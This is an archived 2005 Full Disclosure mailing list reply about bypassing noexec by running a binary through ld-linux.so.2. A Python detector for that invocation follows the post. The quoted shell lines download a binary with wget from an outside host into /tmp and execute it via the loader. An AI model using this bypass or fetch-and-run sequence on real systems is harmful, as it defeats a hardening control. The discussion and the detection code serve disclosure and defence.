Full Disclosure mailing list archives

Re: linux bugs (survival stories)?


From: Joachim Schipper <j.schipper () math uu nl>
Date: Wed, 13 Apr 2005 00:44:12 +0200

'hello world' can bypass noexec
just remove the executable flags from the program headers
the compiled binary doesn't even need to have executable permissions

#include <stdio.h>
int main(int argc, char *argv[])   
{       
  printf("Hello world!\n");
  return 0;
}


% sudo mount -o remount,noexec /tmp
% wget http://pornadmin.net/~tongson/linux/helloworld.bin -O /tmp/helloworld.bin
% /lib/ld-linux.so.2 /tmp/helloworld.bin
Hello world!

This does not seem to work when ld-linux.so.2 is on a filesystem mounted
noexec, though [1]. Wouldn't this make it akin to calling /bin/bash
hello_world.sh?

PaX can stop you from mmap()ing a file and then executing the code
inside, IIRC, but since this breaks X11 it's uncommon to enable the
option.

                Joachim

[1] ./ld-linux.so.2 fails when called without arguments. Checked on
linux-2.6.11.7-grsec. ld-linux.so.2 was moved to a different disk before
the check was made, with and without chroot and strace. Where strace was
used, it showed that exec() failed.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
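
One way to detect the invocation shown in the message above (an added example, not code from the original post): flag process command lines where the dynamic loader is run directly on a file that sits on a noexec mount. The mount table and command lines are constructed sample data, and all function names are hypothetical.

```python
import posixpath
import re
import shlex

# Constructed sample data (not from the post): /proc/mounts-format text and
# command lines as an exec audit source might record them.
SAMPLE_MOUNTS = "/dev/sda1 / ext3 rw 0 0\n/dev/sda2 /tmp ext3 rw,nosuid,noexec 0 0\n"
SAMPLE_CMDLINES = [
    "/lib/ld-linux.so.2 /tmp/helloworld.bin",
    "/lib/ld-linux.so.2 --library-path /opt/lib /usr/bin/id",
    "/lib64/ld-linux-x86-64.so.2 /tmp/../tmp/a.out --flag",
    "/bin/ls /tmp",
]
LOADER_RE = re.compile(r"^ld(-linux)?(-[\w-]+)?\.so(\.\d+)*$")
# Subset of glibc ld.so options that consume the following argument.
OPTS_WITH_ARG = {"--library-path", "--inhibit-rpath", "--audit", "--preload", "--argv0"}

def noexec_table(mounts_text):
    """Map each mount point to True if it carries the noexec option."""
    rows = (line.split() for line in mounts_text.splitlines())
    return {f[1]: "noexec" in f[3].split(",") for f in rows if len(f) >= 4}

def on_noexec(path, table):
    """Longest-prefix match of a normalised path against the mount points."""
    path = posixpath.normpath(path)
    hits = [m for m in table if path == m or path.startswith(m.rstrip("/") + "/")]
    return bool(hits) and table[max(hits, key=len)]

def loader_target(cmdline):
    """Return the program a direct dynamic-loader invocation loads, else None."""
    argv = shlex.split(cmdline)
    if not argv or not LOADER_RE.match(posixpath.basename(argv[0])):
        return None
    args = iter(argv[1:])
    for arg in args:
        if arg in OPTS_WITH_ARG:
            next(args, None)          # skip the option's value
        elif not arg.startswith("--"):
            return arg
    return None

def flag_loader_on_noexec(cmdlines, mounts_text):
    """Command lines that run the loader on a file living on a noexec mount."""
    table = noexec_table(mounts_text)
    return [c for c in cmdlines
            if (t := loader_target(c)) and on_noexec(t, table)]

if __name__ == "__main__":
    for hit in flag_loader_on_noexec(SAMPLE_CMDLINES, SAMPLE_MOUNTS):
        print("ALERT:", hit)
```

Paths are normalised lexically only; relative targets and symlinks would need the process's working directory and a realpath() lookup on the host.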

